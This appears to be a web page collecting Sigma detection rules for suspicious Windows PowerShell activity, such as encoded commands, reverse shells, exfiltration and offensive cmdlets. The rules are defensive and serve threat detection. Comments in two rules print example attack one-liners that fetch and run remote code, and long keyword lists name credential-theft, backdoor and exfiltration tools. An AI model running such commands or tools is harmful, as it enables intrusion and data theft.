author: Florian Roth (Nextron Systems)
date: 2019-04-20
modified: 2023-02-21
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- ' -NoP -sta -NonI -W Hidden -Enc '
- ' -noP -sta -w 1 -enc '
- ' -NoP -NonI -W Hidden -enc '
- ' -noP -sta -w 1 -enc'
- ' -enc SQB'
- ' -nop -exec bypass -EncodedCommand '
condition: selection
falsepositives:
- Other tools that incidentally use the same command line parameters
level: high
related
high
Suspicious PowerShell Encoded Command Patterns
Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
status test
author Florian Roth (Nextron Systems)
id b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious PowerShell Encoded Command Patterns
id: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c
status: test
description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
references:
- https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
author: Florian Roth (Nextron Systems)
date: 2022-05-24
modified: 2023-01-05
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.Exe'
- 'pwsh.dll'
selection_flags:
CommandLine|contains:
- ' -e '
- ' -en '
- ' -enc '
- ' -enco'
selection_encoded:
CommandLine|contains:
- ' JAB'
- ' SUVYI'
- ' SQBFAFgA'
- ' aWV4I'
- ' IAB'
- ' PAA'
- ' aQBlAHgA'
filter_gcworker:
ParentImage|contains:
- 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
- '\gc_worker.exe'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Other tools that work with encoded scripts in the command line instead of script files
level: high
related
high
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
status experimental
author Meroujan Antonyan (vx3r)
id 7b6a7418-3afc-11f0-aff4-000d3abf478c
license Sigma · DRL-1.1
view Sigma YAML
title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
- attack.stealth
- attack.t1027.010
- attack.t1218.007
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
# Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- '-ComObject'
- 'InstallProduct('
- '.Insert('
- 'UILevel'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Suspicious HH.EXE Execution
Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
status test
author Maxim Pavlunin
id e8a95b5e-c891-46e2-b33a-93937d3abc31
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious HH.EXE Execution
id: e8a95b5e-c891-46e2-b33a-93937d3abc31
status: test
description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
references:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
- https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
author: Maxim Pavlunin
date: 2020-04-01
modified: 2023-04-12
tags:
- attack.execution
- attack.initial-access
- attack.stealth
- attack.t1047
- attack.t1059.001
- attack.t1059.003
- attack.t1059.005
- attack.t1059.007
- attack.t1218
- attack.t1218.001
- attack.t1218.010
- attack.t1218.011
- attack.t1566
- attack.t1566.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName: 'HH.exe'
- Image|endswith: '\hh.exe'
selection_paths:
CommandLine|contains:
- '.application'
- '\AppData\Local\Temp\'
- '\Content.Outlook\'
- '\Downloads\'
- '\Users\Public\'
- '\Windows\Temp\'
# - '\AppData\Local\Temp\Temp?_'
# - '\AppData\Local\Temp\Rar$'
# - '\AppData\Local\Temp\7z'
# - '\AppData\Local\Temp\wz'
# - '\AppData\Local\Temp\peazip-tmp'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Potential Data Exfiltration Activity Via CommandLine Tools
Detects the use of various CLI utilities exfiltrating data via web requests
status test
author Nasreddine Bencherchali (Nextron Systems)
id 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
license Sigma · DRL-1.1
view Sigma YAML
title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: test
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
- https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-02
modified: 2025-10-19
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_iwr:
Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\cmd.exe'
CommandLine|contains:
- 'curl '
- 'Invoke-RestMethod'
- 'Invoke-WebRequest'
- 'irm '
- 'iwr '
- 'wget '
CommandLine|contains|all:
- ' -ur' # Shortest possible version of the -uri flag
- ' -me' # Shortest possible version of the -method flag
- ' -b'
- ' POST '
selection_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
selection_curl_data:
CommandLine|contains:
- ' -d ' # Shortest possible version of the --data flag
- ' --data '
selection_wget:
Image|endswith: '\wget.exe'
CommandLine|contains:
- '--post-data'
- '--post-file'
payloads:
- CommandLine|re:
- 'net\s+view'
- 'sc\s+query'
- CommandLine|contains:
- 'Get-Content'
- 'GetBytes'
- 'hostname'
- 'ifconfig'
- 'ipconfig'
- 'netstat'
- 'nltest'
- 'qprocess'
- 'systeminfo'
- 'tasklist'
- 'ToBase64String'
- 'whoami'
- CommandLine|contains|all:
- 'type '
- ' > '
- ' C:\'
condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
- Unlikely
level: high
related
high
Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
status test
author @Kostastsale, TheDFIRReport
id 44e24481-6202-4c62-9127-5a0ae8e3fe3d
license Sigma · DRL-1.1
view Sigma YAML
title: Obfuscated PowerShell OneLiner Execution
id: 44e24481-6202-4c62-9127-5a0ae8e3fe3d
status: test
description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
references:
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
- https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
author: '@Kostastsale, TheDFIRReport'
date: 2022-05-09
modified: 2025-04-16
tags:
- attack.execution
- attack.defense-impairment
- attack.t1059.001
- attack.t1685
logsource:
product: windows
category: process_creation
detection:
selection:
# Example: powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%%{(IRM $_)});&("".SubString.ToString()[67,72,64]-Join"")($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"
Image|endswith: '\powershell.exe'
CommandLine|contains|all:
- 'http://127.0.0.1'
- '%{(IRM $_)}'
- 'Invoke'
condition: selection
falsepositives:
- Unknown
level: high
related
high
Malicious PowerShell Commandlets - ProcessCreation
Detects Commandlet names from well-known PowerShell exploitation frameworks
status test
author Nasreddine Bencherchali (Nextron Systems)
id 02030f2f-6199-49ec-b258-ea71b07e03dc
license Sigma · DRL-1.1
view Sigma YAML
title: Malicious PowerShell Commandlets - ProcessCreation
id: 02030f2f-6199-49ec-b258-ea71b07e03dc
related:
- id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
type: derived
- id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
- https://adsecurity.org/?p=2921
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
- https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
- https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
- https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
- https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
- https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
- https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
- https://github.com/HarmJ0y/DAMP
- https://github.com/samratashok/nishang
- https://github.com/DarkCoderSc/PowerRunAsSystem/
- https://github.com/besimorhino/powercat
- https://github.com/Kevin-Robertson/Powermad
- https://github.com/adrecon/ADRecon
- https://github.com/adrecon/AzureADRecon
- https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
- https://github.com/The-Viper-One/Invoke-PowerDPAPI/
- https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
modified: 2025-12-10
tags:
- attack.execution
- attack.discovery
- attack.t1482
- attack.t1087
- attack.t1087.001
- attack.t1087.002
- attack.t1069.001
- attack.t1069.002
- attack.t1069
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
# Note: Please ensure alphabetical order when adding new entries
CommandLine|contains:
- 'Add-Exfiltration'
- 'Add-Persistence'
- 'Add-RegBackdoor'
- 'Add-RemoteRegBackdoor'
- 'Add-ScrnSaveBackdoor'
- 'Check-VM'
- 'ConvertTo-Rc4ByteStream'
- 'Decrypt-Hash'
- 'Disable-ADIDNSNode'
- 'Disable-MachineAccount'
- 'Do-Exfiltration'
- 'Enable-ADIDNSNode'
- 'Enable-MachineAccount'
- 'Enabled-DuplicateToken'
- 'Exploit-Jboss'
- 'Export-ADR'
- 'Export-ADRCSV'
- 'Export-ADRExcel'
- 'Export-ADRHTML'
- 'Export-ADRJSON'
- 'Export-ADRXML'
- 'Find-Fruit'
- 'Find-GPOLocation'
- 'Find-TrustedDocuments'
- 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
- 'Get-ApplicationHost'
- 'Get-ChromeDump'
- 'Get-ClipboardContents'
- 'Get-FoxDump'
- 'Get-GPPPassword'
- 'Get-IndexedItem'
- 'Get-KerberosAESKey'
- 'Get-Keystrokes'
- 'Get-LSASecret'
- 'Get-MachineAccountAttribute'
- 'Get-MachineAccountCreator'
- 'Get-PassHashes'
- 'Get-RegAlwaysInstallElevated'
- 'Get-RegAutoLogon'
- 'Get-RemoteBootKey'
- 'Get-RemoteCachedCredential'
- 'Get-RemoteLocalAccountHash'
- 'Get-RemoteLSAKey'
- 'Get-RemoteMachineAccountHash'
- 'Get-RemoteNLKMKey'
- 'Get-RickAstley'
- 'Get-Screenshot'
- 'Get-SecurityPackages'
- 'Get-ServiceFilePermission'
- 'Get-ServicePermission'
- 'Get-ServiceUnquoted'
- 'Get-SiteListPassword'
- 'Get-System'
- 'Get-TimedScreenshot'
- 'Get-UnattendedInstallFile'
- 'Get-Unconstrained'
- 'Get-USBKeystrokes'
- 'Get-VaultCredential'
- 'Get-VulnAutoRun'
- 'Get-VulnSchTask'
- 'Grant-ADIDNSPermission'
- 'Gupt-Backdoor'
- 'HTTP-Login'
- 'Install-ServiceBinary'
- 'Install-SSP'
- 'Invoke-ACLScanner'
- 'Invoke-ADRecon'
- 'Invoke-ADSBackdoor'
- 'Invoke-AgentSmith'
- 'Invoke-AllChecks'
- 'Invoke-ARPScan'
- 'Invoke-AzureHound'
- 'Invoke-BackdoorLNK'
- 'Invoke-BadPotato'
- 'Invoke-BetterSafetyKatz'
- 'Invoke-BypassUAC'
- 'Invoke-Carbuncle'
- 'Invoke-Certify'
- 'Invoke-ConPtyShell'
- 'Invoke-CredentialInjection'
- 'Invoke-DAFT'
- 'Invoke-DCSync'
- 'Invoke-DinvokeKatz'
- 'Invoke-DllInjection'
- 'Invoke-DNSUpdate'
- 'Invoke-DNSExfiltrator'
- 'Invoke-DomainPasswordSpray'
- 'Invoke-DowngradeAccount'
- 'Invoke-EgressCheck'
- 'Invoke-Eyewitness'
- 'Invoke-FakeLogonScreen'
- 'Invoke-Farmer'
- 'Invoke-Get-RBCD-Threaded'
- 'Invoke-Gopher'
- 'Invoke-Grouper' # Also Covers Invoke-GrouperX
- 'Invoke-HandleKatz'
- 'Invoke-ImpersonatedProcess'
- 'Invoke-ImpersonateSystem'
- 'Invoke-InteractiveSystemPowerShell'
- 'Invoke-Internalmonologue'
- 'Invoke-Inveigh'
- 'Invoke-InveighRelay'
- 'Invoke-KrbRelay'
- 'Invoke-LdapSignCheck'
- 'Invoke-Lockless'
- 'Invoke-MalSCCM'
- 'Invoke-Mimikatz'
- 'Invoke-Mimikittenz'
- 'Invoke-MITM6'
- 'Invoke-NanoDump'
- 'Invoke-NetRipper'
- 'Invoke-Nightmare'
- 'Invoke-NinjaCopy'
- 'Invoke-OfficeScrape'
- 'Invoke-OxidResolver'
- 'Invoke-P0wnedshell'
- 'Invoke-Paranoia'
- 'Invoke-PortScan'
- 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
- 'Invoke-PostExfil'
- 'Invoke-PowerDump'
- 'Invoke-PowerDPAPI'
- 'Invoke-PowerShellTCP'
- 'Invoke-PowerShellWMI'
- 'Invoke-PPLDump'
- 'Invoke-PsExec'
- 'Invoke-PSInject'
- 'Invoke-PsUaCme'
- 'Invoke-ReflectivePEInjection'
- 'Invoke-ReverseDNSLookup'
- 'Invoke-Rubeus'
- 'Invoke-RunAs'
- 'Invoke-SafetyKatz'
- 'Invoke-SauronEye'
- 'Invoke-SCShell'
- 'Invoke-Seatbelt'
- 'Invoke-ServiceAbuse'
- 'Invoke-ShadowSpray'
- 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
- 'Invoke-Shellcode'
- 'Invoke-SMBScanner'
- 'Invoke-Snaffler'
- 'Invoke-Spoolsample'
- 'Invoke-SpraySinglePassword'
- 'Invoke-SSHCommand'
- 'Invoke-StandIn'
- 'Invoke-StickyNotesExtract'
- 'Invoke-SystemCommand'
- 'Invoke-Tasksbackdoor'
- 'Invoke-Tater'
- 'Invoke-Thunderfox'
- 'Invoke-ThunderStruck'
- 'Invoke-TokenManipulation'
- 'Invoke-Tokenvator'
- 'Invoke-TotalExec'
- 'Invoke-UrbanBishop'
- 'Invoke-UserHunter'
- 'Invoke-VoiceTroll'
- 'Invoke-Whisker'
- 'Invoke-WinEnum'
- 'Invoke-winPEAS'
- 'Invoke-WireTap'
- 'Invoke-WmiCommand'
- 'Invoke-WMIExec'
- 'Invoke-WScriptBypassUAC'
- 'Invoke-Zerologon'
- 'MailRaider'
- 'New-ADIDNSNode'
- 'New-DNSRecordArray'
- 'New-HoneyHash'
- 'New-InMemoryModule'
- 'New-MachineAccount'
- 'New-SOASerialNumberArray'
- 'Out-Minidump'
- 'Port-Scan'
- 'PowerBreach'
- 'powercat '
- 'PowerUp'
- 'PowerView'
- 'Remove-ADIDNSNode'
- 'Remove-MachineAccount'
- 'Remove-Update'
- 'Rename-ADIDNSNode'
- 'Revoke-ADIDNSPermission'
- 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
- 'Set-MacAttribute'
- 'Set-MachineAccountAttribute'
- 'Set-Wallpaper'
- 'Show-TargetScreen'
- 'Start-CaptureServer'
- 'Start-Dnscat2'
- 'Start-WebcamRecorder'
- 'Veeam-Get-Creds'
- 'VolumeShadowCopyTools'
condition: selection
falsepositives:
- Unknown
level: high
related
high
HackTool - Covenant PowerShell Launcher
Detects suspicious command lines used in Covenant luanchers
status test
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
id c260b6db-48ba-4b4a-a76f-2f67644e99d2
license Sigma · DRL-1.1
view Sigma YAML
title: HackTool - Covenant PowerShell Launcher
id: c260b6db-48ba-4b4a-a76f-2f67644e99d2
status: test
description: Detects suspicious command lines used in Covenant luanchers
references:
- https://posts.specterops.io/covenant-v0-5-eee0507b85ba
author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
date: 2020-06-04
modified: 2023-02-21
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1564.003
logsource:
category: process_creation
product: windows
detection:
selection_1:
CommandLine|contains|all:
- '-Sta'
- '-Nop'
- '-Window'
- 'Hidden'
CommandLine|contains:
- '-Command'
- '-EncodedCommand'
selection_2:
CommandLine|contains:
- 'sv o (New-Object IO.MemorySteam);sv d '
- 'mshta file.hta'
- 'GruntHTTP'
- '-EncodedCommand cwB2ACAAbwAgA'
condition: 1 of selection_*
level: high
related
high
Suspicious PowerShell Parameter Substring
Detects suspicious PowerShell invocation with a parameter substring
status test
author Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
id 36210e0d-5b19-485d-a087-c096088885f0
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious PowerShell Parameter Substring
id: 36210e0d-5b19-485d-a087-c096088885f0
status: test
description: Detects suspicious PowerShell invocation with a parameter substring
references:
- http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
date: 2019-01-16
modified: 2022-07-14
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains:
- ' -windowstyle h '
- ' -windowstyl h'
- ' -windowsty h'
- ' -windowst h'
- ' -windows h'
- ' -windo h'
- ' -wind h'
- ' -win h'
- ' -wi h'
- ' -win h '
- ' -win hi '
- ' -win hid '
- ' -win hidd '
- ' -win hidde '
- ' -NoPr '
- ' -NoPro '
- ' -NoProf '
- ' -NoProfi '
- ' -NoProfil '
- ' -nonin '
- ' -nonint '
- ' -noninte '
- ' -noninter '
- ' -nonintera '
- ' -noninterac '
- ' -noninteract '
- ' -noninteracti '
- ' -noninteractiv '
- ' -ec '
- ' -encodedComman '
- ' -encodedComma '
- ' -encodedComm '
- ' -encodedCom '
- ' -encodedCo '
- ' -encodedC '
- ' -encoded '
- ' -encode '
- ' -encod '
- ' -enco '
- ' -en '
- ' -executionpolic '
- ' -executionpoli '
- ' -executionpol '
- ' -executionpo '
- ' -executionp '
- ' -execution bypass'
- ' -executio bypass'
- ' -executi bypass'
- ' -execut bypass'
- ' -execu bypass'
- ' -exec bypass'
- ' -exe bypass'
- ' -ex bypass'
- ' -ep bypass'
- ' /windowstyle h '
- ' /windowstyl h'
- ' /windowsty h'
- ' /windowst h'
- ' /windows h'
- ' /windo h'
- ' /wind h'
- ' /win h'
- ' /wi h'
- ' /win h '
- ' /win hi '
- ' /win hid '
- ' /win hidd '
- ' /win hidde '
- ' /NoPr '
- ' /NoPro '
- ' /NoProf '
- ' /NoProfi '
- ' /NoProfil '
- ' /nonin '
- ' /nonint '
- ' /noninte '
- ' /noninter '
- ' /nonintera '
- ' /noninterac '
- ' /noninteract '
- ' /noninteracti '
- ' /noninteractiv '
- ' /ec '
- ' /encodedComman '
- ' /encodedComma '
- ' /encodedComm '
- ' /encodedCom '
- ' /encodedCo '
- ' /encodedC '
- ' /encoded '
- ' /encode '
- ' /encod '
- ' /enco '
- ' /en '
- ' /executionpolic '
- ' /executionpoli '
- ' /executionpol '
- ' /executionpo '
- ' /executionp '
- ' /execution bypass'
- ' /executio bypass'
- ' /executi bypass'
- ' /execut bypass'
- ' /execu bypass'
- ' /exec bypass'
- ' /exe bypass'
- ' /ex bypass'
- ' /ep bypass'
condition: selection
falsepositives:
- Unknown
level: high
related
high
PowerShell Base64 Encoded FromBase64String Cmdlet
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
status test
author Florian Roth (Nextron Systems)
id fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
license Sigma · DRL-1.1
view Sigma YAML
title: PowerShell Base64 Encoded FromBase64String Cmdlet
id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
status: test
description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-24
modified: 2023-04-06
tags:
- attack.stealth
- attack.t1140
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains: '::FromBase64String'
# UTF-16 LE
- CommandLine|contains:
- 'OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA'
- 'oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA'
- '6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw'
condition: selection
falsepositives:
- Unknown
level: high
related
high
Potential Powershell ReverseShell Connection
Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
status stable
author FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
id edc2f8ae-2412-4dfd-b9d5-0c57727e70be
license Sigma · DRL-1.1
view Sigma YAML
title: Potential Powershell ReverseShell Connection
id: edc2f8ae-2412-4dfd-b9d5-0c57727e70be
status: stable
description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
references:
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1
author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
date: 2021-03-03
modified: 2023-04-05
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
selection_cli:
CommandLine|contains|all:
- ' Net.Sockets.TCPClient'
- '.GetStream('
- '.Write('
condition: all of selection_*
falsepositives:
- In rare administrative cases, this function might be used to check network connectivity
level: high
related
high
Net WebClient Casing Anomalies
Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
status test
author Florian Roth (Nextron Systems)
id c86133ad-4725-4bd0-8170-210788e0a7ba
license Sigma · DRL-1.1
view Sigma YAML
title: Net WebClient Casing Anomalies
id: c86133ad-4725-4bd0-8170-210788e0a7ba
status: test
description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
references:
- https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
author: Florian Roth (Nextron Systems)
date: 2022-05-24
modified: 2023-01-05
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_encoded:
CommandLine|contains:
- 'TgBlAFQALgB3AEUAQg'
- '4AZQBUAC4AdwBFAEIA'
- 'OAGUAVAAuAHcARQBCA'
- 'bgBFAHQALgB3AGUAYg'
- '4ARQB0AC4AdwBlAGIA'
- 'uAEUAdAAuAHcAZQBiA'
- 'TgBFAHQALgB3AGUAYg'
- 'OAEUAdAAuAHcAZQBiA'
- 'bgBlAFQALgB3AGUAYg'
- '4AZQBUAC4AdwBlAGIA'
- 'uAGUAVAAuAHcAZQBiA'
- 'TgBlAFQALgB3AGUAYg'
- 'OAGUAVAAuAHcAZQBiA'
- 'bgBFAFQALgB3AGUAYg'
- '4ARQBUAC4AdwBlAGIA'
- 'uAEUAVAAuAHcAZQBiA'
- 'bgBlAHQALgBXAGUAYg'
- '4AZQB0AC4AVwBlAGIA'
- 'uAGUAdAAuAFcAZQBiA'
- 'bgBFAHQALgBXAGUAYg'
- '4ARQB0AC4AVwBlAGIA'
- 'uAEUAdAAuAFcAZQBiA'
- 'TgBFAHQALgBXAGUAYg'
- 'OAEUAdAAuAFcAZQBiA'
- 'bgBlAFQALgBXAGUAYg'
- '4AZQBUAC4AVwBlAGIA'
- 'uAGUAVAAuAFcAZQBiA'
- 'TgBlAFQALgBXAGUAYg'
- 'OAGUAVAAuAFcAZQBiA'
- 'bgBFAFQALgBXAGUAYg'
- '4ARQBUAC4AVwBlAGIA'
- 'uAEUAVAAuAFcAZQBiA'
- 'bgBlAHQALgB3AEUAYg'
- '4AZQB0AC4AdwBFAGIA'
- 'uAGUAdAAuAHcARQBiA'
- 'TgBlAHQALgB3AEUAYg'
- 'OAGUAdAAuAHcARQBiA'
- 'bgBFAHQALgB3AEUAYg'
- '4ARQB0AC4AdwBFAGIA'
- 'uAEUAdAAuAHcARQBiA'
- 'TgBFAHQALgB3AEUAYg'
- 'OAEUAdAAuAHcARQBiA'
- 'bgBlAFQALgB3AEUAYg'
- '4AZQBUAC4AdwBFAGIA'
- 'uAGUAVAAuAHcARQBiA'
- 'TgBlAFQALgB3AEUAYg'
- 'OAGUAVAAuAHcARQBiA'
- 'bgBFAFQALgB3AEUAYg'
- '4ARQBUAC4AdwBFAGIA'
- 'uAEUAVAAuAHcARQBiA'
- 'TgBFAFQALgB3AEUAYg'
- 'OAEUAVAAuAHcARQBiA'
- 'bgBlAHQALgBXAEUAYg'
- '4AZQB0AC4AVwBFAGIA'
- 'uAGUAdAAuAFcARQBiA'
- 'TgBlAHQALgBXAEUAYg'
- 'OAGUAdAAuAFcARQBiA'
- 'bgBFAHQALgBXAEUAYg'
- '4ARQB0AC4AVwBFAGIA'
- 'uAEUAdAAuAFcARQBiA'
- 'TgBFAHQALgBXAEUAYg'
- 'OAEUAdAAuAFcARQBiA'
- 'bgBlAFQALgBXAEUAYg'
- '4AZQBUAC4AVwBFAGIA'
- 'uAGUAVAAuAFcARQBiA'
- 'TgBlAFQALgBXAEUAYg'
- 'OAGUAVAAuAFcARQBiA'
- 'bgBFAFQALgBXAEUAYg'
- '4ARQBUAC4AVwBFAGIA'
- 'uAEUAVAAuAFcARQBiA'
- 'TgBFAFQALgBXAEUAYg'
- 'OAEUAVAAuAFcARQBiA'
- 'bgBlAHQALgB3AGUAQg'
- '4AZQB0AC4AdwBlAEIA'
- 'uAGUAdAAuAHcAZQBCA'
- 'TgBlAHQALgB3AGUAQg'
- 'OAGUAdAAuAHcAZQBCA'
- 'bgBFAHQALgB3AGUAQg'
- '4ARQB0AC4AdwBlAEIA'
- 'uAEUAdAAuAHcAZQBCA'
- 'TgBFAHQALgB3AGUAQg'
